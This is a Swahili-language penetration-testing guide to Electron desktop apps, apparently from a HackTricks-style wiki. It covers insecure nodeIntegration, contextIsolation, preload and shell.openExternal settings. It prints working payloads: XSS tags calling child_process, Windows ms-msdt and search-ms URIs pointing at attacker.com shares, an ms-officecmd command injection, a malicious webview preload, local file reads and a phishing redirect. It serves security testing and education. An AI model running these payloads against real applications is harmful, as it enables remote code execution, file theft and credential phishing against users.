Electron Desktop Apps

Reading time: 17 minutes

Introduction

Electron inachanganya backend wa ndani (pamoja na NodeJS) na frontend (Chromium), ingawa inakosa baadhi ya mitambo ya usalama ya vivinjari vya kisasa.

Kawaida unaweza kupata msimbo wa programu ya electron ndani ya programu ya .asar, ili kupata msimbo unahitaji kuutoa:

npx asar extract app.asar destfolder #Extract everything
npx asar extract-file app.asar main.js #Extract just a file

Katika msimbo wa chanzo wa programu ya Electron, ndani ya packet.json, unaweza kupata faili ya main.js ambapo mipangilio ya usalama imewekwa.

{
"name": "standard-notes",
"main": "./app/index.js",

Electron ina aina 2 za michakato:

• Michakato Kuu (ina ufikiaji kamili wa NodeJS)
• Michakato ya Renderer (inapaswa kuwa na ufikiaji wa NodeJS ulio na vizuizi kwa sababu za usalama)

mchakato wa renderer utakuwa dirisha la kivinjari linalopakia faili:

const { BrowserWindow } = require("electron")
let win = new BrowserWindow()

//Open Renderer Process
win.loadURL(`file://path/to/index.html`)

Mipangilio ya mchakato wa renderer inaweza kuwekwa katika mchakato mkuu ndani ya faili ya main.js. Baadhi ya mipangilio itakayo zuia programu ya Electron kupata RCE au udhaifu mwingine ikiwa mipangilio imewekwa vizuri.

Programu ya electron inaweza kufikia kifaa kupitia Node apis ingawa inaweza kuwekwa ili kuzuia hilo:

• nodeIntegration - ime zimwa kwa chaguo-msingi. Ikiwa imewashwa, inaruhusu kufikia vipengele vya node kutoka kwa mchakato wa renderer.
• contextIsolation - ime washwa kwa chaguo-msingi. Ikiwa imezimwa, michakato ya msingi na renderer siyo iliyotengwa.
• preload - tupu kwa chaguo-msingi.
• sandbox - imezimwa kwa chaguo-msingi. Itapunguza vitendo ambavyo NodeJS inaweza kufanya.
• Uunganisho wa Node katika Wafanyakazi
• nodeIntegrationInSubframes - ime zimwa kwa chaguo-msingi.
• Ikiwa nodeIntegration ime washwa, hii itaruhusu matumizi ya Node.js APIs katika kurasa za wavuti ambazo zime pakiwa katika iframes ndani ya programu ya Electron.
• Ikiwa nodeIntegration ime zimwa, basi preloads zitawekwa katika iframe.

Mfano wa mipangilio:

const mainWindowOptions = {
title: "Discord",
backgroundColor: getBackgroundColor(),
width: DEFAULT_WIDTH,
height: DEFAULT_HEIGHT,
minWidth: MIN_WIDTH,
minHeight: MIN_HEIGHT,
transparent: false,
frame: false,
resizable: true,
show: isVisible,
webPreferences: {
blinkFeatures: "EnumerateDevices,AudioOutputDevices",
nodeIntegration: false,
contextIsolation: false,
sandbox: false,
nodeIntegrationInSubFrames: false,
preload: _path2.default.join(__dirname, "mainScreenPreload.js"),
nativeWindowOpen: true,
enableRemoteModule: false,
spellcheck: true,
},
}

Baadhi ya RCE payloads kutoka hapa:

Example Payloads (Windows):
<img
src="x"
onerror="alert(require('child_process').execSync('calc').toString());" />

Example Payloads (Linux & MacOS):
<img
src="x"
onerror="alert(require('child_process').execSync('gnome-calculator').toString());" />
<img
src="x"
onerror="alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());" />
<img
src="x"
onerror="alert(require('child_process').execSync('id').toString());" />
<img
src="x"
onerror="alert(require('child_process').execSync('ls -l').toString());" />
<img
src="x"
onerror="alert(require('child_process').execSync('uname -a').toString());" />

Capture traffic

Badilisha usanidi wa start-main na ongeza matumizi ya proxy kama:

"start-main": "electron ./dist/main/main.js --proxy-server=127.0.0.1:8080 --ignore-certificateerrors",

Electron Local Code Injection

Ikiwa unaweza kutekeleza programu ya Electron kwa ndani, inawezekana kwamba unaweza kufanya itekeleze msimbo wa javascript wa kiholela. Angalia jinsi katika:

macOS Electron Applications Injection

RCE: XSS + nodeIntegration

Ikiwa nodeIntegration imewekwa kuwa on, JavaScript ya ukurasa wa wavuti inaweza kutumia vipengele vya Node.js kwa urahisi kwa kuita require(). Kwa mfano, njia ya kutekeleza programu ya calc kwenye Windows ni:

<script>
require("child_process").exec("calc")
// or
top.require("child_process").exec("open /System/Applications/Calculator.app")
</script>

RCE: preload

Script iliyoonyeshwa katika mipangilio hii inachukuliwa kabla ya scripts nyingine katika renderer, hivyo ina ufikiaji usio na kikomo kwa Node APIs:

new BrowserWindow{
webPreferences: {
nodeIntegration: false,
preload: _path2.default.join(__dirname, 'perload.js'),
}
});

Kwa hivyo, script inaweza kusafirisha node-features kwa kurasa:

typeof require === "function"
window.runCalc = function () {
require("child_process").exec("calc")
}

<body>
<script>
typeof require === "undefined"
runCalc()
</script>
</body>

[!NOTE] > Ikiwa contextIsolation iko juu, hii haitafanya kazi

RCE: XSS + contextIsolation

contextIsolation inanzisha muktadha tofauti kati ya skripti za ukurasa wa wavuti na msimbo wa ndani wa JavaScript wa Electron ili utekelezaji wa JavaScript wa kila msimbo usiathiriane. Hii ni kipengele muhimu kuondoa uwezekano wa RCE.

Ikiwa muktadha haujawekwa kando, mshambuliaji anaweza:

1. Kutekeleza JavaScript isiyo na mipaka katika renderer (XSS au kuhamia kwenye tovuti za nje)
2. Kufuta njia iliyojengwa ndani ambayo inatumika katika preload au msimbo wa ndani wa Electron ili kuwa na kazi yake
3. Kusababisha matumizi ya kazi iliyofutwa
4. RCE?

Kuna maeneo 2 ambapo njia zilizojengwa ndani zinaweza kufutwa: Katika msimbo wa preload au katika msimbo wa ndani wa Electron:

Electron contextIsolation RCE via preload code

Electron contextIsolation RCE via Electron internal code

Electron contextIsolation RCE via IPC

Bypass click event

Ikiwa kuna vizuizi vilivyowekwa unapobofya kiungo, huenda ukawa na uwezo wa kuv bypass ukifanya bofya katikati badala ya bofya la kushoto la kawaida

window.addEventListener('click', (e) => {

RCE kupitia shell.openExternal

Kwa maelezo zaidi kuhusu mifano hii angalia https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8 na https://benjamin-altpeter.de/shell-openexternal-dangers/

Wakati wa kupeleka programu ya desktop ya Electron, kuhakikisha mipangilio sahihi ya nodeIntegration na contextIsolation ni muhimu. Imeanzishwa kwamba utendaji wa mbali wa msimbo wa mteja (RCE) unaolenga skripti za preload au msimbo asilia wa Electron kutoka kwa mchakato mkuu unazuia kwa ufanisi na mipangilio hii ikiwa mahali.

Wakati mtumiaji anapoingiliana na viungo au kufungua madirisha mapya, wasikilizaji maalum wa matukio huanzishwa, ambayo ni muhimu kwa usalama na utendaji wa programu:

webContents.on("new-window", function (event, url, disposition, options) {}
webContents.on("will-navigate", function (event, url) {}

Hawa wasikilizaji wanabadilishwa na programu ya desktop ili kutekeleza mantiki ya biashara yake. Programu inakadiria ikiwa kiungo kilichotembelewa kinapaswa kufunguliwa ndani au kwenye kivinjari cha mtandao cha nje. Uamuzi huu kawaida hufanywa kupitia kazi, openInternally. Ikiwa kazi hii inarudisha false, inaashiria kwamba kiungo kinapaswa kufunguliwa nje, kwa kutumia kazi ya shell.openExternal.

Hapa kuna pseudocode iliyo rahisishwa:

Miongozo bora ya usalama ya Electron JS inashauri kutochukua maudhui yasiyoaminika kwa kutumia kazi ya openExternal, kwani inaweza kusababisha RCE kupitia protokali mbalimbali. Mifumo ya uendeshaji inasaidia protokali tofauti ambazo zinaweza kusababisha RCE. Kwa mifano ya kina na maelezo zaidi juu ya mada hii, mtu anaweza kurejelea rasilimali hii, ambayo inajumuisha mifano ya protokali za Windows zinazoweza kutumia udhaifu huu.

Katika macos, kazi ya openExternal inaweza kutumiwa kutekeleza amri zisizo na mipaka kama katika shell.openExternal('file:///System/Applications/Calculator.app').

Mifano ya unyakuzi wa protokali za Windows ni pamoja na:

<script>
window.open(
"ms-msdt:id%20PCWDiagnostic%20%2Fmoreoptions%20false%20%2Fskip%20true%20%2Fparam%20IT_BrowseForFile%3D%22%5Cattacker.comsmb_sharemalicious_executable.exe%22%20%2Fparam%20IT_SelectProgram%3D%22NotListed%22%20%2Fparam%20IT_AutoTroubleshoot%3D%22ts_AUTO%22"
)
</script>

<script>
window.open(
"search-ms:query=malicious_executable.exe&crumb=location:%5C%5Cattacker.com%5Csmb_share%5Ctools&displayname=Important%20update"
)
</script>

<script>
window.open(
"ms-officecmd:%7B%22id%22:3,%22LocalProviders.LaunchOfficeAppForResult%22:%7B%22details%22:%7B%22appId%22:5,%22name%22:%22Teams%22,%22discovered%22:%7B%22command%22:%22teams.exe%22,%22uri%22:%22msteams%22%7D%7D,%22filename%22:%22a:/b/%2520--disable-gpu-sandbox%2520--gpu-launcher=%22C:%5CWindows%5CSystem32%5Ccmd%2520/c%2520ping%252016843009%2520&&%2520%22%22%7D%7D"
)
</script>

RCE: webviewTag + vulnerable preload IPC + shell.openExternal

Hii vuln inaweza kupatikana katika this report.

webviewTag ni kipengele kilichopitwa na wakati ambacho kinaruhusu matumizi ya NodeJS katika mchakato wa renderer, ambacho kinapaswa kuzuiwa kwani kinaruhusu kupakia script ndani ya muktadha wa preload kama:

<webview src="https://example.com/" preload="file://malicious.example/test.js"></webview>

Hivyo, mshambuliaji ambaye anafanikiwa kupakia ukurasa wowote anaweza kutumia lebo hiyo kupakia skripti ya awali isiyo na mipaka.

Skripti hii ya awali ilitumiwa vibaya kisha kuita huduma ya IPC iliyo na udhaifu (skype-new-window) ambayo ilikuwa ikitumia shell.openExternal kupata RCE:

(async() => {
const { ipcRenderer } = require("electron");
await ipcRenderer.invoke("skype-new-window", "https://example.com/EXECUTABLE_PATH");
setTimeout(async () => {
const username = process.execPath.match(/C:\\Users\\([^\\]+)/);
await ipcRenderer.invoke("skype-new-window", `file:///C:/Users/${username[1]}/Downloads/EXECUTABLE_NAME`);
}, 5000);
})();

Kusoma Faili za Ndani: XSS + contextIsolation

Kuzima contextIsolation kunaruhusu matumizi ya <webview> tags, sawa na <iframe>, kwa ajili ya kusoma na kutoa faili za ndani. Mfano uliotolewa unaonyesha jinsi ya kutumia udhaifu huu kusoma maudhui ya faili za ndani:

Zaidi, njia nyingine ya kusoma faili ya ndani inashirikiwa, ikionyesha udhaifu muhimu wa kusoma faili za ndani katika programu ya desktop ya Electron. Hii inahusisha kuingiza script ili kutumia programu na kutoa data:

<br /><br /><br /><br />
<h1>
pwn<br />
<iframe onload="j()" src="/etc/hosts">xssxsxxsxs</iframe>
<script type="text/javascript">
function j() {
alert(
"pwned contents of /etc/hosts :\n\n " +
frames[0].document.body.innerText
)
}
</script>
</h1>

RCE: XSS + Old Chromium

Ikiwa chromium inayotumiwa na programu ni ya zamani na kuna udhaifu ujulikanaji juu yake, inaweza kuwa inawezekana kuikabili na kupata RCE kupitia XSS.
Unaweza kuona mfano katika writeup hii: https://blog.electrovolt.io/posts/discord-rce/

XSS Phishing kupitia Internal URL regex bypass

Kukisia umepata XSS lakini huwezi kuanzisha RCE au kuiba faili za ndani unaweza kujaribu kuitumia kuiba akidi kupitia phishing.

Kwanza kabisa unahitaji kujua kinachotokea unapojaribu kufungua URL mpya, ukikagua msimbo wa JS katika front-end:

webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)
webContents.on("will-navigate", function (event, url) {}                    // opens the custom openInternally function (it is declared below)

Kito cha openInternally kitaamua kama kiungo kitafunguliwa katika dirisha la desktop kwani ni kiungo kinachomilikiwa na jukwaa, au kama kitafunguliwa katika browza kama rasilimali ya upande wa tatu.

Katika kesi ambapo regex inayotumika na kazi hiyo ni dhaifu kwa kupita (kwa mfano kwa kutokuepusha nukta za subdomains) mshambuliaji anaweza kutumia XSS ili kufungua dirisha jipya ambalo litakuwa katika miundombinu ya mshambuliaji likiomba taarifa za kuingia kwa mtumiaji:

<script>
window.open("<http://subdomainagoogleq.com/index.html>")
</script>

file:// Protocol

Kama ilivyotajwa katika the docs kurasa zinazotumia file:// zina ufikiaji wa moja kwa moja kwa kila faili kwenye mashine yako, ikimaanisha kwamba masuala ya XSS yanaweza kutumika kupakia faili zisizo za kawaida kutoka kwa mashine ya mtumiaji. Kutumia protokali maalum kunazuia matatizo kama haya kwani unaweza kuzuia protokali hiyo kuhudumia seti maalum ya faili pekee.

Remote module

Moduli ya Electron Remote inaruhusu mchakato wa renderer kufikia APIs za mchakato mkuu, ikirahisisha mawasiliano ndani ya programu ya Electron. Hata hivyo, kuwezesha moduli hii kunaingiza hatari kubwa za usalama. Inapanua uso wa shambulio la programu, na kuifanya kuwa nyeti zaidi kwa udhaifu kama shambulio la cross-site scripting (XSS).

Tangu Electron 14, moduli ya remote ya Electron inaweza kuwezeshwa katika hatua kadhaa kwa sababu ya sababu za usalama na utendaji, ni pendekezo kutotumia.

Ili kuweza kuifanya, inahitajika kwanza kuwezesha katika mchakato mkuu:

const remoteMain = require('@electron/remote/main')
remoteMain.initialize()
[...]
function createMainWindow() {
mainWindow = new BrowserWindow({
[...]
})
remoteMain.enable(mainWindow.webContents)

Kisha, mchakato wa renderer unaweza kuagiza vitu kutoka kwa moduli kama:

import { dialog, getCurrentWindow } from '@electron/remote'

The blog post inaonyesha baadhi ya functions za kuvutia zilizowekwa na kitu app kutoka kwa moduli ya mbali:

• app.relaunch([options])
• Inaanzisha upya programu kwa kutoka kwenye mfano wa sasa na kuanzisha mpya. Inafaida kwa maktaba za programu au mabadiliko makubwa ya hali.
• app.setAppLogsPath([path])
• Inafafanua au inaunda directory ya kuhifadhi app logs. Logs zinaweza kupatikana au kubadilishwa kwa kutumia app.getPath() au app.setPath(pathName, newPath).
• app.setAsDefaultProtocolClient(protocol[, path, args])
• Inasajili executable ya sasa kama mshughulikiaji wa kawaida kwa protocol maalum. Unaweza kutoa path ya kawaida na hoja ikiwa inahitajika.
• app.setUserTasks(tasks)
• Inazidisha kazi kwenye Kikundi cha Kazi katika Jump List (kwenye Windows). Kila kazi inaweza kudhibiti jinsi programu inavyo anzishwa au ni hoja zipi zinazopelekwa.
• app.importCertificate(options, callback)
• Inaleta PKCS#12 certificate kwenye store ya vyeti ya mfumo (Linux pekee). Callback inaweza kutumika kushughulikia matokeo.
• app.moveToApplicationsFolder([options])
• Inahamisha programu kwenye folda ya Maombi (kwenye macOS). Inasaidia kuhakikisha ufungaji wa kawaida kwa watumiaji wa Mac.
• app.setJumpList(categories)
• Inaanzisha au inatoa Jump List ya kawaida kwenye Windows. Unaweza kubainisha makundi ili kuandaa jinsi kazi zinavyoonekana kwa mtumiaji.
• app.setLoginItemSettings(settings)
• Inapanga ni executables zipi zinaanzishwa wakati wa kuingia pamoja na chaguzi zao (macOS na Windows pekee).

Native.app.relaunch({args: [], execPath: "/System/Applications/Calculator.app/Contents/MacOS/Calculator"});
Native.app.exit()

systemPreferences module

API kuu ya kufikia mapendeleo ya mfumo na kutolea matukio ya mfumo katika Electron. Mbinu kama subscribeNotification, subscribeWorkspaceNotification, getUserDefault, na setUserDefault zote ni sehemu ya moduli hii.

Mfano wa matumizi:

const { systemPreferences } = require('electron');

// Subscribe to a specific notification
systemPreferences.subscribeNotification('MyCustomNotification', (event, userInfo) => {
console.log('Received custom notification:', userInfo);
});

// Get a user default key from macOS
const recentPlaces = systemPreferences.getUserDefault('NSNavRecentPlaces', 'array');
console.log('Recent Places:', recentPlaces);

subscribeNotification / subscribeWorkspaceNotification

• Inasikiliza arifa za asili za macOS kwa kutumia NSDistributedNotificationCenter.
• Kabla ya macOS Catalina, ungeweza kunusa arifa zote zilizotolewa kwa kupitisha nil kwa CFNotificationCenterAddObserver.
• Baada ya Catalina / Big Sur, programu zilizowekwa kwenye sandbox bado zinaweza kujiunga na matukio mengi (kwa mfano, kufungwa/kufunguliwa kwa skrini, kuwekwa kwa sauti, shughuli za mtandao, nk.) kwa kujiandikisha arifa kwa jina.

getUserDefault / setUserDefault

• Inawasiliana na NSUserDefaults, ambayo inahifadhi mapendeleo ya programu au ya ulimwengu kwenye macOS.

• getUserDefault inaweza kurejesha taarifa nyeti, kama vile mahali pa faili za hivi karibuni au mahali pa kijiografia la mtumiaji.

• setUserDefault inaweza kubadilisha mapendeleo haya, ambayo yanaweza kuathiri mipangilio ya programu.

• Katika matoleo ya zamani ya Electron (kabla ya v8.3.0), tu seti ya kawaida ya NSUserDefaults ilikuwa inapatikana.

Shell.showItemInFolder

Kazi hii inaonyesha faili iliyotolewa katika meneja wa faili, ambayo inaweza kutekeleza faili hiyo kiotomatiki.

Kwa maelezo zaidi angalia https://blog.doyensec.com/2021/02/16/electron-apis-misuse.html

Content Security Policy

Programu za Electron zinapaswa kuwa na Content Security Policy (CSP) ili kuzuia mashambulizi ya XSS. CSP ni kiwango cha usalama ambacho husaidia kuzuia utekelezaji wa kanuni zisizoaminika kwenye kivinjari.

Kawaida inasanidiwa katika faili ya main.js au katika template ya index.html na CSP ndani ya meta tag.

Kwa maelezo zaidi angalia:

Content Security Policy (CSP) Bypass

Tools

• Electronegativity ni chombo cha kutambua makosa ya usanidi na mifano ya usalama isiyofaa katika programu za msingi za Electron.
• Electrolint ni nyongeza ya chanzo wazi ya VS Code kwa programu za Electron inayotumia Electronegativity.
• nodejsscan kuangalia maktaba za wahusika wa tatu zenye udhaifu
• Electro.ng: Unahitaji kuununua

Labs

Katika https://www.youtube.com/watch?v=xILfQGkLXQo&t=22s unaweza kupata maabara ya kutumia programu za Electron zenye udhaifu.

Amri zingine zitakazokusaidia katika maabara:

# Download apps from these URls
# Vuln to nodeIntegration
https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable1.zip
# Vuln to contextIsolation via preload script
https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable2.zip
# Vuln to IPC Rce
https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable3.zip

# Get inside the electron app and check for vulnerabilities
npm audit

# How to use electronegativity
npm install @doyensec/electronegativity -g
electronegativity -i vulnerable1

# Run an application from source code
npm install -g electron
cd vulnerable1
npm install
npm start

Marejeo

• https://shabarkin.medium.com/unsafe-content-loading-electron-js-76296b6ac028
• https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d
• https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=8
• https://www.youtube.com/watch?v=a-YnG3Mx-Tg
• https://www.youtube.com/watch?v=xILfQGkLXQo&t=22s
• Utafiti zaidi na maandiko kuhusu usalama wa Electron katika https://github.com/doyensec/awesome-electronjs-hacking
• https://www.youtube.com/watch?v=Tzo8ucHA5xw&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&index=81
• https://blog.doyensec.com/2021/02/16/electron-apis-misuse.html